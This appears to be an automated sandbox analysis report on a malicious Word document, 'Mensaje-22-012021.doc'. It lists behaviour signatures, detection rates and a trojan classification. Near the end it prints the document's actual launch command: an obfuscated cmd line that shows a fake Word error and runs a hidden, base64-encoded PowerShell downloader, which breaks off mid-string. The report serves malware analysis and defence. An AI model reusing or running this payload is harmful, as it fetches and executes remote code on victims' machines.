Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Eeyfocnhd\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017D7D	7_2_10017D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100189F6	7_2_100189F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007605	7_2_10007605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000620A	7_2_1000620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F411	7_2_1001F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F813	7_2_1000F813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D013	7_2_1000D013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008816	7_2_10008816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000421E	7_2_1000421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C424	7_2_1001C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002628	7_2_10002628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004A2B	7_2_10004A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DC2F	7_2_1000DC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018831	7_2_10018831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007E34	7_2_10007E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A83A	7_2_1000A83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000903F	7_2_1000903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014E4B	7_2_10014E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000704B	7_2_1000704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D44C	7_2_1000D44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C04C	7_2_1001C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005856	7_2_10005856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001658	7_2_10001658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011259	7_2_10011259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018668	7_2_10018668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C07D	7_2_1000C07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014693	7_2_10014693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CAA0	7_2_1001CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004EA1	7_2_10004EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008CA3	7_2_10008CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C6AD	7_2_1001C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100056B3	7_2_100056B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015AB8	7_2_10015AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005EB9	7_2_10005EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100106C2	7_2_100106C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009CC8	7_2_10009CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D2CB	7_2_1001D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D0DE	7_2_1000D0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009AE1	7_2_10009AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100142E2	7_2_100142E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DEE8	7_2_1001DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100094EC	7_2_100094EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C6EF	7_2_1000C6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF11	7_2_1000CF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015115	7_2_10015115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001231B	7_2_1001231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BF25	7_2_1001BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DB25	7_2_1001DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000492A	7_2_1000492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D530	7_2_1001D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000213E	7_2_1000213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB42	7_2_1000CB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10016B45	7_2_10016B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001654F	7_2_1001654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003D4E	7_2_10003D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018F65	7_2_10018F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012965	7_2_10012965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001676B	7_2_1001676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010F6D	7_2_10010F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011B71	7_2_10011B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017570	7_2_10017570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A176	7_2_1000A176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DD78	7_2_1001DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10013D7C	7_2_10013D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E19F	7_2_1001E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100199A4	7_2_100199A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015DAA	7_2_10015DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001EDB9	7_2_1001EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006BC0	7_2_10006BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100173C0	7_2_100173C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100177C0	7_2_100177C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019DC0	7_2_10019DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100193C9	7_2_100193C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CDCC	7_2_1001CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000ADCE	7_2_1000ADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B1D2	7_2_1001B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004BDE	7_2_10004BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005BE1	7_2_10005BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002DEE	7_2_10002DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100137F4	7_2_100137F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B3FE	7_2_1001B3FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 24_2_1000B9B3	24_2_1000B9B3

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: Mensaje-22-012021.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module M355vvc_qfa, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: Mensaje-22-012021.doc

OLE indicator, VBA macros: true

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@44/8@4/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$nsaje-22-012021.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB9F.tmp

Jump to behavior

Source: Mensaje-22-012021.doc

OLE indicator, Word Document stream: true

Source: Mensaje-22-012021.doc	OLE document summary: title field not present or empty
Source: Mensaje-22-012021.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ ./......./.....................X...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......h.\|.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................g1.j......................X.............}..v....x.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................g1.j..... X...............X.............}..v............0...............h.\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................1.j......................X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................1.j....H.\|...............X.............}..v....h.......0.................\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................0.j......................X.............}..v.....S......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................0.j..... X...............X.............}..v.....S......0.................\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F\|.....(.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............G..j......................X.............}..v.... .......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.7.............}..v....0.......0................F\|.....$.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....0J\|...............X.............}..v....0&......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............G..j.....&................X.............}..v....h'......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............G..j......................X.............}..v....h/......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....0J\|...............X.............}..v....06......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............G..j.....6................X.............}..v....h7......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....0J\|...............X.............}..v....0>......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............G..j.....>................X.............}..v....h?......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....0J\|...............X.............}..v....0F......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............G..j.....F................X.............}..v....hG......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....0J\|...............X.............}..v....0N......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............G..j.....N................X.............}..v....hO......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....0J\|...............X.............}..v....0V......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............G..j.....V................X.............}..v....hW......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....0J\|...............X.............}..v....0^......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............G..j.....^................X.............}..v....h_......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0f......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....f................X.............}..v....hg......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0n......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....n................X.............}..v....ho......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v.....t......0.......................V.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j....8u................X.............}..v.....u......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....`\|......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....}................X.............}..v.....}......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v............0.......................r.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v.... .......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j....0J\|...............X.............}..v............0................F\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j....h.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E.................X.............}..v.... .......0...............H.\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E.................X.............}..v.....!......0...............H.\|.............H...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString

Source: Mensaje-22-012021.doc	Virustotal: Detection: 61%
Source: Mensaje-22-012021.doc	Metadefender: Detection: 32%
Source: Mensaje-22-012021.doc	ReversingLabs: Detection: 62%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnA